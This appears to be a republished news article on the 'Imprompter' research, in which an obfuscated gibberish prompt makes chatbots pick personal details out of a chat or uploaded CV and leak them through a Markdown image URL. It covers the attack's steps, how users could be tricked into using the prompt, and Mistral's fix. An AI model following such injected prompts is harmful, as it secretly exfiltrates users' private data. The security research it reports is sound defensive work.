This Prompt Can Make an AI Chatbot Identify and Extract Personal Details From Your Chats

Mohamed October 18, 2024

0 2 2 minutes read

The researchers say that if the attack were carried out in the real world, people could be socially engineered into believing the unintelligible prompt might do something useful, such as improve their CV. The researchers point to numerous websites that provide people with prompts they can use. They tested the attack by uploading a CV to conversations with chatbots, and it was able to return the personal information contained within the file.

Earlence Fernandes, an assistant professor at UCSD who was involved in the work, says the attack approach is fairly complicated as the obfuscated prompt needs to identify personal information, form a working URL, apply Markdown syntax, and not give away to the user that it is behaving nefariously. Fernandes likens the attack to malware, citing its ability to perform functions and behavior in ways the user might not intend.

“Normally you could write a lot of computer code to do this in traditional malware,” Fernandes says. “But here I think the cool thing is all of that can be embodied in this relatively short gibberish prompt.”

A spokesperson for Mistral AI says the company welcomes security researchers helping it to make its products safer for users. “Following this feedback, Mistral AI promptly implemented the proper remediation to fix the situation,” the spokesperson says. The company treated the issue as one with “medium severity,” and its fix blocks the Markdown renderer from operating and being able to call an external URL through this process, meaning external image loading isn’t possible.

Fernandes believes Mistral AI’s update is likely one of the first times an adversarial prompt example has led to an LLM product being fixed, rather than the attack being stopped by filtering out the prompt. However, he says, limiting the capabilities of LLM agents could be “counterproductive” in the long run.

Meanwhile, a statement from the creators of ChatGLM says the company has security measures in place to help with user privacy. “Our model is secure, and we have always placed a high priority on model security and privacy protection,” the statement says. “By open-sourcing our model, we aim to leverage the power of the open-source community to better inspect and scrutinize all aspects of these models’ capabilities, including their security.”

A “High-Risk Activity”

Dan McInerney, the lead threat researcher at security company Protect AI, says the Imprompter paper “releases an algorithm for automatically creating prompts that can be used in prompt injection to do various exploitations, like PII exfiltration, image misclassification, or malicious use of tools the LLM agent can access.” While many of the attack types within the research may be similar to previous methods, McInerney says, the algorithm ties them together. “This is more along the lines of improving automated LLM attacks than undiscovered threat surfaces in them.”

However, he adds that as LLM agents become more commonly used and people give them more authority to take actions on their behalf, the scope for attacks against them increases. “Releasing an LLM agent that accepts arbitrary user input should be considered a high-risk activity that requires significant and creative security testing prior to deployment,” McInerney says.

For companies, that means understanding the ways an AI agent can interact with data and how they can be abused. But for individual people, similarly to common security advice, you should consider just how much information you’re providing to any AI application or company, and if using any prompts from the internet, be cautious of where they come from.

Source link

This Prompt Can Make an AI Chatbot Identify and Extract Personal Details From Your Chats

A “High-Risk Activity”

Mohamed

Leave a Reply Cancel reply

Rwanda starts vaccine trials against deadly Marburg virus

Oil price rises on Biden Iran oil strike comments

How can Israel attack Syria? | Israel attacks Lebanon News

Selena Gomez and Benny Blanco Are Engaged

UK launches probe into Ticketmaster over Oasis shows | News

Netanyahu and the Israeli protesters are on the same genocidal page | Israel-Palestine conflict

Mighty Patch™ Original patch from Hero Cosmetics – Hydrocolloid Acne Pimple Patch for Covering Zits and Blemishes in Face and Skin, Vegan-friendly and Not Tested on Animals (36 Count)

US secures release of 135 political prisoners from Nicaragua | Human Rights News

Kojie San Skin Brightening Soap – Original Kojic Acid, Dark Spot Remover Bar Soap with Coconut & Tea Tree Oil – 65g x 4 Bars

A “High-Risk Activity”

Mohamed

Subscribe to our mailing list to get the new updates!

NASA’s C-130 Aircraft En Route to India in Support of NISAR Mission

Maggie Rogers Sings 'Night Changes' in Emotional Liam Payne Tribute

Related Articles

Designer Babies Are Teenagers Now—and Some of Them Need Therapy Because of It

Kyu’s Tiny Camera Only Captures 9-Second Videos

9 Best Diffusers for Curly Hair (2024), Tested and Reviewed

The Billion-Dollar Adult Streaming Industry Is Fueled by Horrific Labor Abuses

Leave a Reply Cancel reply

Rwanda starts vaccine trials against deadly Marburg virus

Oil price rises on Biden Iran oil strike comments

How can Israel attack Syria? | Israel attacks Lebanon News

Selena Gomez and Benny Blanco Are Engaged

UK launches probe into Ticketmaster over Oasis shows | News

Netanyahu and the Israeli protesters are on the same genocidal page | Israel-Palestine conflict

Mighty Patch™ Original patch from Hero Cosmetics – Hydrocolloid Acne Pimple Patch for Covering Zits and Blemishes in Face and Skin, Vegan-friendly and Not Tested on Animals (36 Count)

US secures release of 135 political prisoners from Nicaragua | Human Rights News

Kojie San Skin Brightening Soap – Original Kojic Acid, Dark Spot Remover Bar Soap with Coconut & Tea Tree Oil – 65g x 4 Bars